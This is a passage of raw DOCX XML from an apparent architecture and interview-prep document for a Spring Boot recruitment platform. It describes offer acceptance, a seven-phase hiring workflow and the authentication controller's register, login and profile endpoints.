        <w:t>Handled by OfferService.java. When candidate accepts, Application status moves to OFFER_ACCEPTED (HIRED) and requisition filled counts increment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Practical Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter issues an offer of ₹24 LPA with joining date October 1, 2026. Candidate opens dashboard, reviews terms, and clicks 'Accept Offer'. Status updates to HIRED.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter POST /api/offers -&gt; Offer saved (PENDING) -&gt; Candidate PUT /api/offers/1/respond { status: 'ACCEPTED' } -&gt; Application status updated -&gt; Recruiter notified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Interview-Ready Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>'The offer engine provides end-to-end closure to the recruitment cycle, allowing binding offers to be extended, tracked, and accepted digitally with complete audit transparency.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>18. End-to-End System Workflows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Below is the complete architectural trace of the end-to-end recruitment lifecycle across the full stack:</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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hiring Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Full-Stack Technical Trace (Client -&gt; Network -&gt; Service -&gt; DB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 1: Registration &amp; Profile Setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate signs up via /register. Spring Security hashes password with BCrypt (cost 10). Candidate navigates to /profile and saves 6 technical skills (Java, Spring Boot, React, SQL, etc.). Stored in profile_skills table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 2: Requisition Publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter logs in to /recruiter/dashboard, opens Post Job modal, specifies 'Senior Backend Engineer' with ₹18-28 LPA, Hybrid in Bengaluru, and required skills ['Java', 'Spring Boot', 'AWS']. Stored in jobs table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 3: Discovery &amp; Match Calculation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate searches /jobs. Client calls GET /api/jobs/1/match. Backend computes 92% match score breakdown. Candidate reviews skills and clicks 'Apply Now'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 4: Application Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backend validates no duplicate exists, creates Application record in APPLIED status, and dispatches confirmation alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 5: Recruiter Triage &amp; Shortlisting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter opens ATS pipeline at /recruiter/jobs/1/applicants, reviews candidate match breakdown, and updates stage to SHORTLISTED via PUT /api/recruiter/applications/1/status.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 6: Technical Interview Dispatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter clicks 'Schedule Interview', inputs 'Technical Round 1' with Google Meet link. Application transitions to INTERVIEW_SCHEDULED and candidate sees meeting pill.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phase 7: Offer Extension &amp; Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter issues offer via POST /api/offers with ₹22 LPA. Candidate reviews offer in /candidate/dashboard, clicks 'Accept Offer', transitioning application to OFFER_ACCEPTED.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Complete File-by-File Deep Dive: Controllers, Services &amp; Data Tier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>This section provides an exhaustive, class-by-class inspection of all 14 REST Controllers, 11 Domain Services, 13 JPA Entities, and 13 Spring Data Repositories implemented in the GlobalCo Spring Boot backend. Every endpoint, injection dependency, validation rule, and transaction boundary is documented here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Exhaustive Inspection of All 14 REST Controllers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: AuthController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/auth | Primary Domain: Authentication &amp; Identity Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AuthService, AuthenticationManager, JwtUtil, UserRepository</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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/auth/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SignupRequest DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created / AuthResponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validates username/email uniqueness, hashes password with BCrypt, saves User entity with selected Role, returns JWT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LoginRequest DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / AuthResponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authenticates credentials against Spring Security, retrieves user details, issues signed JWT token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/auth/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None (Bearer Header)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / UserDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
